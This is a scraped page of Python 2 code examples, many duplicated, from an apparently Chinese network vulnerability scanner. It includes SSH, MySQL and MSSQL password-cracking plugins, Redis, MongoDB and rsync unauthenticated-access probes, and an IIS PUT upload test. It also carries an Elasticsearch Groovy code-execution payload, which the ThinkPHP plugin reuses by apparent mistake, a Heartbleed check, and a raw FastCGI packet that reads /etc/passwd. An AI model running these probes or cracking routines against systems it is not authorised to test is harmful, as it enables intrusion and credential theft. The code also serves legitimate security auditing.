Ejemplo n.º 1
0
 def __init__(self):
     PluginBase.__init__(self)
     self.threadpool = ThreadPool(num_of_threads=10,
                                  num_of_work=10,
                                  daemon=True)
     self.service = 'easgvy'
     self.port_list = ['9200']
Ejemplo n.º 2
0
    def __init__(self):
        PluginBase.__init__(self)

        self.user_dict = 'user.txt'
        self.pass_dict = 'password.txt'
        self.service = 'mysql'
        self.threadpool = ThreadPool(num_of_threads= 5 , num_of_work= 10 , daemon = True)
Ejemplo n.º 3
0
 def __init__(self):
     PluginBase.__init__(self)
     self.threadpool = ThreadPool(num_of_threads=10,
                                  num_of_work=10,
                                  daemon=True)
     self.service = 'rsync'
     self.rsync_dic_path = '%s/%s' % (DATA_DIC_PATH, 'rsync_dic/rsync.dic'
                                      )  #chmod 600 rsync.dic
     print self.rsync_dic_path
     self.port_list = ['873']
Ejemplo n.º 4
0
class WebIISPutPlugin(PluginBase):

    name = "WebIISPutPlugin"
    version = '1.0'

    def __init__(self):
        PluginBase.__init__(self)
        self.threadpool = ThreadPool(num_of_threads=20,
                                     num_of_work=10,
                                     daemon=True)

    def execute_run(self, ip, port, bdomain, taskid):
        self.threadpool.add_job(self.__test_iisput, ip, port)
        self.async_deal_into_db(bdomain, taskid)

    def __test_iisput(self, *args, **kwargs):
        '''
        验证是否存在iis PUT 漏洞
        :param url:
        :return:
        '''
        (ip, port) = args
        url = make_url(ip, port)
        txt_url = urlparse.urljoin(url, '1.txt')
        try:
            req = requests.put('%s' % txt_url, data="test!", timeout=2)
            if req.status_code == 201:  #201 created
                return {'url': url, 'status': True}
            else:
                return {'url': url, 'status': False}
        except:
            return {'url': url, 'status': False}

    def async_deal_into_db(self, bdomain, taskid):
        '''
        入库
        :return:
        '''
        while not self.threadpool.resultQueue.empty():
            try:
                result_dit = self.threadpool.resultQueue.get_nowait()
                if result_dit['status']:
                    iis_vulurl = {}
                    iis_vulurl['sid'] = taskid
                    iis_vulurl['url'] = result_dit['url']
                    iis_vulurl['first_time'] = getCurTime()
                    self.plugin_db.insert_by_dict(IISPUTVUL_TABLE, iis_vulurl)
            except:
                break

    def wait_for_complete(self, bdomain, taskid):
        #PluginBase.wait_for_complete(self)
        self.async_deal_into_db(bdomain, taskid)
        self.db_close()
Ejemplo n.º 5
0
class WebIISPutPlugin(PluginBase):

    name = "WebIISPutPlugin"
    version = '1.0'


    def __init__(self):
        PluginBase.__init__(self)
        self.threadpool = ThreadPool(num_of_threads= 20 , num_of_work= 10 , daemon = True)

    def execute_run(self, ip, port, bdomain, taskid):
        self.threadpool.add_job(self.__test_iisput, ip, port)
        self.async_deal_into_db(bdomain, taskid)

    def __test_iisput(self, *args, **kwargs):
        '''
        验证是否存在iis PUT 漏洞
        :param url:
        :return:
        '''
        (ip, port) = args
        url = make_url(ip, port)
        txt_url = urlparse.urljoin(url, '1.txt')
        try:
            req = requests.put('%s' % txt_url, data = "test!", timeout=2)
            if req.status_code == 201:  #201 created
                return {'url':url, 'status': True}
            else:
                return {'url':url, 'status': False}
        except:
            return {'url':url, 'status': False}

    def async_deal_into_db(self, bdomain, taskid):
        '''
        入库
        :return:
        '''
        while not self.threadpool.resultQueue.empty():
            try:
                result_dit = self.threadpool.resultQueue.get_nowait()
                if result_dit['status']:
                    iis_vulurl = {}
                    iis_vulurl['sid'] = taskid
                    iis_vulurl['url'] = result_dit['url']
                    iis_vulurl['first_time'] = getCurTime()
                    self.plugin_db.insert_by_dict(IISPUTVUL_TABLE, iis_vulurl)
            except:
                break

    def wait_for_complete(self, bdomain, taskid):
        #PluginBase.wait_for_complete(self)
        self.async_deal_into_db(bdomain, taskid)
        self.db_close()
Ejemplo n.º 6
0
class WebPathScanPlugin(PluginBase):

    name = "WebPathScanPlugin"
    version = '1.0'

    def __init__(self):
        PluginBase.__init__(self)
        self.threadpool = ThreadPool(num_of_threads=10,
                                     num_of_work=10,
                                     daemon=True)

    def execute_run(self, ip, port, bdomain, taskid):
        if bdomain == DOMAIN_TYPE[0]:
            webscan = WebScan(make_url(ip, port), webdomain=True, proxy=False)
        elif bdomain == DOMAIN_TYPE[1]:
            webscan = WebScan(make_url(ip, port), webdomain=False, proxy=False)
        self.threadpool.add_job(webscan.run)
        self.async_deal_into_db(bdomain, taskid)

    def wait_for_complete(self, bdomain, taskid):
        #PluginBase.wait_for_complete(self)
        self.async_deal_into_db(bdomain, taskid)
        self.db_close()

    def async_deal_into_db(self, bdomain, taskid):
        '''
        入库
        :return:
        '''
        while not self.threadpool.resultQueue.empty():
            try:
                result_dit = self.threadpool.resultQueue.get(block=False)
                figerinfo = result_dit['figerinfo']
                exist_result_list = result_dit['result_list']
                for exist_result in exist_result_list:
                    vulurl = {}
                    vulurl['sid'] = taskid
                    vulurl['url'] = exist_result['url']
                    vulurl['title'] = exist_result['title']
                    vulurl['keyword'] = ''
                    vulurl['code'] = exist_result['http_code']
                    vulurl['figerinfo'] = figerinfo
                    vulurl['first_time'] = getCurTime()
                    if bdomain == DOMAIN_TYPE[0]:
                        #sql = "insert into t_web_vulurl(`sid`, `url`, `title`, `keyword`, `code`, `figerinfo`, `first_time`) values('%s', '%s', '%s', '%s', '%s', '%s', '%s')" % (str(taskid), str(exist_result['url']) , str(exist_result['title']), '', str(exist_result['http_code']), figerinfo, getCurTime())
                        self.plugin_db.insert_by_dict(WEBVUL_TABLE, vulurl)
                    elif bdomain == DOMAIN_TYPE[1]:
                        self.plugin_db.insert_by_dict(WEBIPVUL_TABLE, vulurl)
            except Exception, e:
                logger.error(str(e))
                break
Ejemplo n.º 7
0
class WebPathScanPlugin(PluginBase):

    name = "WebPathScanPlugin"
    version = '1.0'


    def __init__(self):
        PluginBase.__init__(self)
        self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)

    def execute_run(self, ip, port, bdomain, taskid):
        if bdomain == DOMAIN_TYPE[0]:
            webscan = WebScan(make_url(ip, port), webdomain=True, proxy=False)
        elif bdomain == DOMAIN_TYPE[1]:
            webscan = WebScan(make_url(ip, port), webdomain=False, proxy = False)
        self.threadpool.add_job(webscan.run)
        self.async_deal_into_db(bdomain, taskid)

    def wait_for_complete(self, bdomain, taskid):
        #PluginBase.wait_for_complete(self)
        self.async_deal_into_db(bdomain, taskid)
        self.db_close()

    def async_deal_into_db(self, bdomain, taskid):
        '''
        入库
        :return:
        '''
        while not self.threadpool.resultQueue.empty():
            try:
                result_dit = self.threadpool.resultQueue.get(block = False)
                figerinfo = result_dit['figerinfo']
                exist_result_list = result_dit['result_list']
                for exist_result in exist_result_list:
                    vulurl = {}
                    vulurl['sid'] = taskid
                    vulurl['url'] = exist_result['url']
                    vulurl['title'] = exist_result['title']
                    vulurl['keyword'] = ''
                    vulurl['code'] = exist_result['http_code']
                    vulurl['figerinfo'] = figerinfo
                    vulurl['first_time'] = getCurTime()
                    if bdomain == DOMAIN_TYPE[0]:
                        #sql = "insert into t_web_vulurl(`sid`, `url`, `title`, `keyword`, `code`, `figerinfo`, `first_time`) values('%s', '%s', '%s', '%s', '%s', '%s', '%s')" % (str(taskid), str(exist_result['url']) , str(exist_result['title']), '', str(exist_result['http_code']), figerinfo, getCurTime())
                        self.plugin_db.insert_by_dict(WEBVUL_TABLE , vulurl)
                    elif bdomain == DOMAIN_TYPE[1]:
                        self.plugin_db.insert_by_dict(WEBIPVUL_TABLE, vulurl)
            except Exception,e:
                logger.error(str(e))
                break
Ejemplo n.º 8
0
class MssqlCrackPlugin(PluginBase):

    name = "MssqlCrackPlugin"
    version = '1.0'

    def __init__(self):
        PluginBase.__init__(self)

        self.user_dict = 'mssqluser.txt'
        self.pass_dict = 'password.txt'
        self.service = 'mssql'
        self.threadpool = ThreadPool(num_of_threads=5,
                                     num_of_work=10,
                                     daemon=True)
        self.portlist = ['1433', '1434']

    def execute_run(self, ip, port, taskid):
        if str(port) in self.portlist:
            mssqlcrack = PortCrackBase(self.user_dict, self.pass_dict)
            self.threadpool.add_job(mssqlcrack.crack,
                                    ip=ip,
                                    port=port,
                                    service=self.service)
            self.async_deal_into_db(taskid)

    def async_deal_into_db(self, taskid):
        '''
        异步入库
        :return:
        '''
        while not self.threadpool.resultQueue.empty():
            try:
                result_dit = self.threadpool.resultQueue.get_nowait()
                portcrack_dic = {}
                portcrack_dic['sid'] = taskid
                portcrack_dic['host'] = result_dit['ip']
                portcrack_dic['port'] = result_dit['port']
                portcrack_dic['username'] = result_dit['username']
                portcrack_dic['password'] = result_dit['password']
                portcrack_dic['service'] = self.service
                portcrack_dic['first_time'] = getCurTime()
                self.plugin_db.insert_by_dict(PORTCRACK_TABLE, portcrack_dic)
            except:
                break

    def wait_for_complete(self):
        PluginBase.wait_for_complete(self)
        self.db_close()
Ejemplo n.º 9
0
 def __init__(self):
     PluginBase.__init__(self)
     self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
     self.service = 'rsync'
     self.rsync_dic_path = '%s/%s' % (DATA_DIC_PATH, 'rsync_dic/rsync.dic') #chmod 600 rsync.dic
     print self.rsync_dic_path
     self.port_list = ['873']
Ejemplo n.º 10
0
class SSHCrackPlugin(PluginBase):

    name = "SSHCrackPlugin"
    version = '1.0'

    def __init__(self):
        PluginBase.__init__(self)

        self.user_dict = 'sshuser.txt'
        self.pass_dict = 'password.txt'
        self.service = 'ssh'
        self.threadpool = ThreadPool(num_of_threads= 5 , num_of_work= 10 , daemon = True)


    def execute_run(self, ip, port, taskid):
        if str(port) == '22':
            sshcrack = PortCrackBase(self.user_dict, self.pass_dict)
            self.threadpool.add_job(sshcrack.crack, ip = ip, port = port, service = self.service)
            self.async_deal_into_db(taskid)


    def async_deal_into_db(self, taskid):
        '''
        异步入库
        :return:
        '''
        while not self.threadpool.resultQueue.empty():
            try:
                result_dit = self.threadpool.resultQueue.get_nowait()
                portcrack_dic = {}
                portcrack_dic['sid'] = taskid
                portcrack_dic['host'] = result_dit['ip']
                portcrack_dic['port'] = result_dit['port']
                portcrack_dic['username'] = result_dit['username']
                portcrack_dic['password'] = result_dit['password']
                portcrack_dic['service'] = self.service
                portcrack_dic['first_time'] = getCurTime()
                self.plugin_db.insert_by_dict(PORTCRACK_TABLE, portcrack_dic)
            except:
                break


    def wait_for_complete(self, taskid):
        PluginBase.wait_for_complete(self)
        self.db_close()
Ejemplo n.º 11
0
class MongodbUnauthPlugin(PluginBase):

    name = "MongodbUnauthPlugin"
    version = '1.0'
    description = 'mongodb匿名访问'


    def __init__(self):
        PluginBase.__init__(self)
        self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
        self.service = 'mongodb'
        self.port_list = ['27017', '28017']

    def execute_run(self, ip, port, taskid):
        if str(port) in self.port_list:
            logger.info('[Mongodb] ip:%s, port:%s' % (str(ip), str(port)))
            self.threadpool.add_job(self.__test_mongodbunauth, ip, port)
            self.async_deal_into_db(taskid)


    def __test_mongodbunauth(self, *args, **kwargs):
        '''
        验证是否存在mongodb未授权访问漏洞
        :param url:
        :return:
        '''
        (ip, port) = args[0]
        bunauth = False
        try:
            connection = pymongo.MongoClient(ip, port, socketTimeoutMS=3000)
            dbname = connection.database_names()
            connection.close()
            #101.227.21.94:27017/[u'Log', u'db', u'config', u'admin']
            #logger.info(ip + ":" + str(port) + '/' + str(dbname))
            bunauth = True
        except Exception,e:
            pass
        return {'ip' : ip, 'status' : bunauth, 'port' : str(port)}
Ejemplo n.º 12
0
class RedisUnauthPlugin(PluginBase):

    name = "RedisUnauthPlugin"
    version = '1.0'
    description = 'redis匿名访问'


    def __init__(self):
        PluginBase.__init__(self)
        self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
        self.service = 'redis'
        self.port_list = ['6379']

    def execute_run(self, ip, port, taskid):
        if str(port) in self.port_list:
            logger.info('[redis] ip:%s, port:%s' % (str(ip), str(port)))
            self.threadpool.add_job(self.__test_redisunauth, ip, port)
            self.async_deal_into_db(taskid)


    def __test_redisunauth(self, *args, **kwargs):
        '''
        验证是否存在redis未授权访问漏洞
        :param url:
        :return:
        '''
        (ip, port) = args[0]
        bunauth = False
        try:
            r = redis.StrictRedis(host=ip, port = int(port), db=0, socket_timeout = 2, socket_connect_timeout = 1)
            r.lpush('foo', 'bar')
            if r.rpop('foo') == 'bar':
                bunauth = True
        except Exception,e:
            pass
        return {'ip' : ip, 'port' : port, 'status' : bunauth}
    def run(self):

        self.threadpool = ThreadPool(num_of_threads= self.threadpool_count , num_of_work= 0 , daemon = False, timeout = 30)
        while self.cip_que.qsize() > 0:
            cip_dic = self.cip_que.get_nowait()
            self.taskid = cip_dic['taskid']
            #判断是否是内网IP
            if not test_private_ip(cip_dic['ip']):
                logger.info('current scan ip %s' % cip_dic['ip'])
                nmap = NmapScan(ip = cip_dic['ip'], threads_num = 30)
                self.threadpool.add_job(nmap.run)
            else:
                logger.info('skip private ip:%s!' % cip_dic['ip'])
            time.sleep(0.5)

        if self.threadpool is not None:
            self.threadpool.wait_for_complete() #等待线程结束
            self.insert_db()
            self.threadpool = None

            logger.info('port scan over!')
            self.vulplugin_dispatch() #开启扫描插件
            logger.info('plugin start running......')
Ejemplo n.º 14
0
 def __init__(self):
     PluginBase.__init__(self)
     self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
     self.service = 'thinkphp'
Ejemplo n.º 15
0
class FastcgiPlugin(PluginBase):

    name = "FastcgiPlugin"
    version = '1.0'
    description = 'fastcgi remote exec'

    def __init__(self):
        PluginBase.__init__(self)
        self.threadpool = ThreadPool(num_of_threads=10,
                                     num_of_work=10,
                                     daemon=True)
        self.service = 'fastcgi'
        self.port_list = ['9000']

    def execute_run(self, ip, port, taskid):
        if str(port) in self.port_list:
            logger.info('[fastcgi] ip:%s, port:%s' % (str(ip), str(port)))
            self.threadpool.add_job(self.__test_fastcgi, ip, port)
            self.async_deal_into_db(taskid)

    def __test_fastcgi(self, *args, **kwargs):
        '''
        :param url:
        :return:
        '''
        bvulnerable = False
        (ip, port) = args[0]
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5.0)
        sock.connect((ip, int(port)))
        data = """
        01 01 00 01 00 08 00 00  00 01 00 00 00 00 00 00
        01 04 00 01 00 8f 01 00  0e 03 52 45 51 55 45 53
        54 5f 4d 45 54 48 4f 44  47 45 54 0f 08 53 45 52
        56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50
        2f 31 2e 31 0d 01 44 4f  43 55 4d 45 4e 54 5f 52
        4f 4f 54 2f 0b 09 52 45  4d 4f 54 45 5f 41 44 44
        52 31 32 37 2e 30 2e 30  2e 31 0f 0b 53 43 52 49
        50 54 5f 46 49 4c 45 4e  41 4d 45 2f 65 74 63 2f
        70 61 73 73 77 64 0f 10  53 45 52 56 45 52 5f 53
        4f 46 54 57 41 52 45 67  6f 20 2f 20 66 63 67 69
        63 6c 69 65 6e 74 20 00  01 04 00 01 00 00 00 00
        """
        data_s = ''
        for _ in data.split():
            data_s += chr(int(_, 16))
        sock.send(data_s)
        try:
            ret = sock.recv(1024)
            print ret
            if ret.find(':root:') > 0:
                bvulnerable = True
            else:
                bvulnerable = False
        except:
            pass

        sock.close()

        return {'ip': ip, 'port': port, 'status': bvulnerable}

    def async_deal_into_db(self, taskid):
        '''
        异步入库
        :return:
        '''
        while not self.threadpool.resultQueue.empty():
            try:
                result_dit = self.threadpool.resultQueue.get_nowait()
                if result_dit['status']:
                    sysvul_dic = {}
                    sysvul_dic['sid'] = taskid
                    sysvul_dic['ip'] = result_dit['ip']
                    sysvul_dic['port'] = result_dit['port']
                    sysvul_dic['service'] = self.service
                    sysvul_dic['first_time'] = getCurTime()
                    self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic)
            except:
                break

    def wait_for_complete(self, taskid):
        #PluginBase.wait_for_complete(self)
        self.async_deal_into_db(taskid)
        self.db_close()
Ejemplo n.º 16
0
	def __init__(self):
		PluginBase.__init__(self)
		self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
		self.service = 'openssl'
		self.port_list = ['443', '8443', '9443']
Ejemplo n.º 17
0
class FastcgiPlugin(PluginBase):

    name = "FastcgiPlugin"
    version = '1.0'
    description = 'fastcgi remote exec'


    def __init__(self):
        PluginBase.__init__(self)
        self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
        self.service = 'fastcgi'
        self.port_list = ['9000']

    def execute_run(self, ip, port, taskid):
        if str(port) in self.port_list:
            logger.info('[fastcgi] ip:%s, port:%s' % (str(ip), str(port)))
            self.threadpool.add_job(self.__test_fastcgi, ip, port)
            self.async_deal_into_db(taskid)


    def __test_fastcgi(self, *args, **kwargs):
        '''
        :param url:
        :return:
        '''
        bvulnerable = False
        (ip, port) = args[0]
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0)
        sock.connect((ip, int(port)))
        data = """
        01 01 00 01 00 08 00 00  00 01 00 00 00 00 00 00
        01 04 00 01 00 8f 01 00  0e 03 52 45 51 55 45 53
        54 5f 4d 45 54 48 4f 44  47 45 54 0f 08 53 45 52
        56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50
        2f 31 2e 31 0d 01 44 4f  43 55 4d 45 4e 54 5f 52
        4f 4f 54 2f 0b 09 52 45  4d 4f 54 45 5f 41 44 44
        52 31 32 37 2e 30 2e 30  2e 31 0f 0b 53 43 52 49
        50 54 5f 46 49 4c 45 4e  41 4d 45 2f 65 74 63 2f
        70 61 73 73 77 64 0f 10  53 45 52 56 45 52 5f 53
        4f 46 54 57 41 52 45 67  6f 20 2f 20 66 63 67 69
        63 6c 69 65 6e 74 20 00  01 04 00 01 00 00 00 00
        """
        data_s = ''
        for _ in data.split():
            data_s += chr(int(_,16))
        sock.send(data_s)
        try:
            ret = sock.recv(1024)
            print ret
            if ret.find(':root:') > 0:
                bvulnerable = True
            else:
                bvulnerable = False
        except:
            pass

        sock.close()

        return {'ip':ip, 'port': port, 'status':bvulnerable}



    def async_deal_into_db(self, taskid):
        '''
        异步入库
        :return:
        '''
        while not self.threadpool.resultQueue.empty():
            try:
                result_dit = self.threadpool.resultQueue.get_nowait()
                if result_dit['status']:
                    sysvul_dic = {}
                    sysvul_dic['sid'] = taskid
                    sysvul_dic['ip']  = result_dit['ip']
                    sysvul_dic['port'] = result_dit['port']
                    sysvul_dic['service'] = self.service
                    sysvul_dic['first_time'] = getCurTime()
                    self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic)
            except:
                break


    def wait_for_complete(self, taskid):
        #PluginBase.wait_for_complete(self)
        self.async_deal_into_db(taskid)
        self.db_close()
Ejemplo n.º 18
0
class RsyncUnauthPlugin(PluginBase):

    name = "RsyncUnauthPlugin"
    version = '1.0'
    description = 'rsync匿名访问'

    def __init__(self):
        PluginBase.__init__(self)
        self.threadpool = ThreadPool(num_of_threads=10,
                                     num_of_work=10,
                                     daemon=True)
        self.service = 'rsync'
        self.rsync_dic_path = '%s/%s' % (DATA_DIC_PATH, 'rsync_dic/rsync.dic'
                                         )  #chmod 600 rsync.dic
        print self.rsync_dic_path
        self.port_list = ['873']

    def execute_run(self, ip, port, taskid):
        if str(port) in self.port_list:
            logger.info('[rsync] ip:%s, port:%s' % (str(ip), str(port)))
            self.threadpool.add_job(self.run, ip, port)
            self.async_deal_into_db(taskid)

    def run(self, *args, **kwargs):
        global UNAUTH
        UNAUTH = False
        (ip, port) = args[0]
        if self.__test_rsyncunauth(ip):
            return {'ip': ip, 'port': port, 'status': True}
        else:
            return {'ip': ip, 'port': port, 'status': False}

    def __test_rsyncunauth(self, ip, data=' '):
        '''
        验证是否存在rsync未授权访问漏洞
        :param url:
        :return:
        '''
        global UNAUTH
        cmd = 'rsync -v --password-file=' + self.rsync_dic_path + '--timeout=5 ' + ip + '::' + data
        print cmd
        (status,
         resp) = commands.getstatusoutput('rsync -v --password-file=' +
                                          self.rsync_dic_path +
                                          '  --timeout=5 ' + ip + '::' + data)
        if status == 0:  #表示获取# 到敏感信息
            if resp == '':
                return UNAUTH
            resp_dic = resp.split(' \t\n')
            for item in resp_dic:
                re_result = re.search(
                    r'[dwrx-]{10}\s+[\d]+\s+[\d]{4}\/[\d]{1,2}\/[\d]{1,2}\s+[0-5]\d:[0-5]\d:[0-5]\d\s+(.*)',
                    item)
                if re_result is not None:
                    UNAUTH = True
                    break
                if item != ' ':
                    self.__test_rsyncunauth(ip, item[:item.find(' ')])
            return UNAUTH
        else:
            return UNAUTH

    def async_deal_into_db(self, taskid):
        '''
        异步入库
        :return:
        '''
        while not self.threadpool.resultQueue.empty():
            try:
                result_dit = self.threadpool.resultQueue.get_nowait()
                if result_dit['status']:
                    sysvul_dic = {}
                    sysvul_dic['sid'] = taskid
                    sysvul_dic['ip'] = result_dit['ip']
                    sysvul_dic['port'] = result_dit['port']
                    sysvul_dic['service'] = self.service
                    sysvul_dic['first_time'] = getCurTime()
                    print sysvul_dic['ip'] + "  success!!!"
                    #self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic)
            except:
                break

    def wait_for_complete(self, taskid):
        #PluginBase.wait_for_complete(self)
        self.async_deal_into_db(taskid)
        self.db_close()
Ejemplo n.º 19
0
class OpensslPlugin(PluginBase):

	name = "OpensslPlugin"
	version = '1.0'
	description = 'openssl heartbleed'

	def __init__(self):
		PluginBase.__init__(self)
		self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
		self.service = 'openssl'
		self.port_list = ['443', '8443', '9443']

	def execute_run(self, ip, port, taskid):
		if str(port) in self.port_list:
			logger.info('[Openssl] ip:%s, port:%s' % (str(ip), str(port)))
			self.threadpool.add_job(self.__test_heartbleed, ip, port)
			self.async_deal_into_db(taskid)

	def __test_heartbleed(self, *args, **kwargs):
		'''
		:param args:
		:param kwargs:
		:return:
		'''
		(ip, port) = args[0]
		bvulnerable = False
		try:
			s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			s.connect((ip, int(port)))
			s.send(hello)
			while True:
				typ, ver, pay = recvmsg(s)
				if typ == None:
					s.close()
				if typ == 22 and ord(pay[0]) == 0x0E:
					break
			s.send(hb)
			if hit_hb(s):
				bvulnerable = True
			s.close()
		except:
			pass
		return {'ip':ip, 'port': port, 'status':bvulnerable}

	def async_deal_into_db(self, taskid):
		while not self.threadpool.resultQueue.empty():
			try:
				result_dit = self.threadpool.resultQueue.get_nowait()
				if result_dit['status']:
					sysvul_dic = {}
					sysvul_dic['sid'] = taskid
					sysvul_dic['ip']  = result_dit['ip']
					sysvul_dic['port'] = result_dit['port']
					sysvul_dic['service'] = self.service
					sysvul_dic['first_time'] = getCurTime()
					self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic)
			except:
				break

	def wait_for_complete(self, taskid):
		#PluginBase.wait_for_complete(self)
		self.async_deal_into_db(taskid)
		self.db_close()
Ejemplo n.º 20
0
 def __init__(self):
     PluginBase.__init__(self)
     self.threadpool = ThreadPool(num_of_threads=10,
                                  num_of_work=10,
                                  daemon=True)
Ejemplo n.º 21
0
class EasGvyRemotePlugin(PluginBase):

    name = "EasGvyRemotePlugin"
    version = '1.0'
    description = 'eas grovy命令执行'

    def __init__(self):
        PluginBase.__init__(self)
        self.threadpool = ThreadPool(num_of_threads=10,
                                     num_of_work=10,
                                     daemon=True)
        self.service = 'easgvy'
        self.port_list = ['9200']

    def execute_run(self, ip, port, taskid):
        if str(port) in self.port_list:
            self.threadpool.add_job(self.__test_easgvy, ip, port)
            self.async_deal_into_db(taskid)

    def __test_easgvy(self, *args, **kwargs):
        '''
        :param url:
        :return:
        '''
        (ip, port) = args[0]
        self.url = 'http://%s:%s/_search' % (ip, str(port))
        payload = {
            "size": 1,
            "script_fields": {
                "POC": {
                    "script":
                    "java.lang.Math.class.forName(\"java.lang.Runtime\")",
                    "lang": "groovy"
                }
            }
        }

        try:
            req = urllib2.Request(self.url,
                                  headers=HTTP_HEADERS,
                                  data=json.dumps(payload))
            resp = urllib2.urlopen(req, timeout=3)
            json_content = json.loads(resp.read())
            if json_content['hits']['hits'][0]['fields']['POC'][
                    0] == 'class java.lang.Runtime':
                return {'ip': ip, 'port': port, 'status': True}
            else:
                return {'ip': ip, 'port': port, 'status': False}
        except:
            return {'ip': ip, 'port': port, 'status': False}

    def async_deal_into_db(self, taskid):
        '''
        异步入库
        :return:
        '''
        while not self.threadpool.resultQueue.empty():
            try:
                result_dit = self.threadpool.resultQueue.get_nowait()
                print result_dit
                if result_dit['status']:
                    sysvul_dic = {}
                    sysvul_dic['sid'] = taskid
                    sysvul_dic['ip'] = result_dit['ip']
                    sysvul_dic['port'] = result_dit['port']
                    sysvul_dic['service'] = self.service
                    sysvul_dic['first_time'] = getCurTime()
                    self.plugin_db.insert_by_dict(WEBAPP_KEY, sysvul_dic)
            except:
                break

    def wait_for_complete(self, taskid):
        #PluginBase.wait_for_complete(self)
        self.async_deal_into_db(taskid)
        self.db_close()
Ejemplo n.º 22
0
class TpRemotePlugin(PluginBase):

    name = "TpRemotePlugin"
    version = '1.0'
    description = 'thinkphp 代码执行'


    def __init__(self):
        PluginBase.__init__(self)
        self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
        self.service = 'thinkphp'

    def execute_run(self, ip, port, taskid):
        self.threadpool.add_job(self.__test_tpexec, ip, port)
        self.async_deal_into_db(taskid)


    def __test_tpexec(self, *args, **kwargs):
        '''
        :param url:
        :return:
        '''
        (ip, port) = args[0]
        self.url = 'http://%s:%s/index.php' % (ip, str(port))
        payload = {"size": 1,"script_fields": {"POC": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\")","lang": "groovy"}}}

        try:
            req = urllib2.Request(self.url, headers= HTTP_HEADERS, data = json.dumps(payload))
            resp = urllib2.urlopen(req, timeout = 3)
            json_content = json.loads(resp.read())
            if json_content['hits']['hits'][0]['fields']['POC'][0] == 'class java.lang.Runtime':
                return {'ip' : ip, 'port' : port, 'status' : True}
            else:
                return {'ip' : ip, 'port' : port, 'status' : False}
        except:
             return {'ip' : ip, 'port' : port, 'status' : False}


    def async_deal_into_db(self, taskid):
        '''
        异步入库
        :return:
        '''
        while not self.threadpool.resultQueue.empty():
            try:
                result_dit = self.threadpool.resultQueue.get_nowait()
                print result_dit
                if result_dit['status']:
                    sysvul_dic = {}
                    sysvul_dic['sid'] = taskid
                    sysvul_dic['ip']  = result_dit['ip']
                    sysvul_dic['port'] = result_dit['port']
                    sysvul_dic['service'] = self.service
                    sysvul_dic['first_time'] = getCurTime()
                    self.plugin_db.insert_by_dict(WEBAPP_KEY, sysvul_dic)
            except:
                break

    def wait_for_complete(self, taskid):
        #PluginBase.wait_for_complete(self)
        self.async_deal_into_db(taskid)
        self.db_close()
Ejemplo n.º 23
0
 def __init__(self):
     PluginBase.__init__(self)
     self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
     self.service = 'mongodb'
     self.port_list = ['27017', '28017']
class PortScanPluginController():
    '''
    端口扫描控制器
    '''
    def __init__(self, rediswork = None):
        self.cip_que = Queue.Queue(0)
        self.threadpool = None
        self.threadpool_count = 5  #线程池数
        self.ps_db = PortScanDB().db
        self.rediswork = rediswork
        self.taskid = 0

    def push_ip(self, ip, taskid):
        self.cip_que.put_nowait({'ip':ip,'taskid':taskid})

    def get_ip_cnt(self):
        return self.cip_que.qsize()

    def run(self):

        self.threadpool = ThreadPool(num_of_threads= self.threadpool_count , num_of_work= 0 , daemon = False, timeout = 30)
        while self.cip_que.qsize() > 0:
            cip_dic = self.cip_que.get_nowait()
            self.taskid = cip_dic['taskid']
            #判断是否是内网IP
            if not test_private_ip(cip_dic['ip']):
                logger.info('current scan ip %s' % cip_dic['ip'])
                nmap = NmapScan(ip = cip_dic['ip'], threads_num = 30)
                self.threadpool.add_job(nmap.run)
            else:
                logger.info('skip private ip:%s!' % cip_dic['ip'])
            time.sleep(0.5)

        if self.threadpool is not None:
            self.threadpool.wait_for_complete() #等待线程结束
            self.insert_db()
            self.threadpool = None

            logger.info('port scan over!')
            self.vulplugin_dispatch() #开启扫描插件
            logger.info('plugin start running......')

    def insert_db(self):
        '''
        结果导入数据库
        '''
        while self.threadpool.resultQueue.qsize() > 0:
            result = self.threadpool.resultQueue.get_nowait()
            for item in result:
                for port, service in item['scan_result'].iteritems():
                    if service is None or service == '':
                        service = 'unknown'
                    domainPortDic = {}
                    domainPortDic['sid'] = self.taskid
                    domainPortDic['ip']   = item['ip']
                    domainPortDic['port'] = port
                    domainPortDic['service'] = service
                    domainPortDic['first_time'] = getCurTime()
                    self.ps_db.insert_by_dict(DOMAIN_PORT_TABLE, domainPortDic)

                    #存入redis 队列
                    self.portScanDispatch(item['ip'], port)


    def portScanDispatch(self, ip, port):
        '''
        端口任务调度
        '''
        #判断当前端口是否存在Web访问
        if port not in NOWEB_PORT:
            if test_webservice(ip, port):
                self.rediswork.pushvulInfo(keyname = WEBSCAN_KEY, ip = ip, port = port, taskid = self.taskid, type = DOMAIN_TYPE[1])
        #bug修改 -----这里不能用elif啊 每个流程都需要走完才行
        if CRACK_PORT.has_key(int(port)):
            self.rediswork.pushvulInfo(keyname = PORTCRACK_KEY, ip = ip, port = port, taskid = self.taskid)
        if SYSVUL_PORT.has_key(int(port)):
            self.rediswork.pushvulInfo(keyname = SYSVUL_KEY, ip = ip, port = port, taskid = self.taskid)


    def vulplugin_dispatch(self):
        webpathscan_dispath()
        portcrack_dispath()
        systemvul_dispath()
Ejemplo n.º 25
0
 def __init__(self):
     PluginBase.__init__(self)
     self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
     self.service = 'fastcgi'
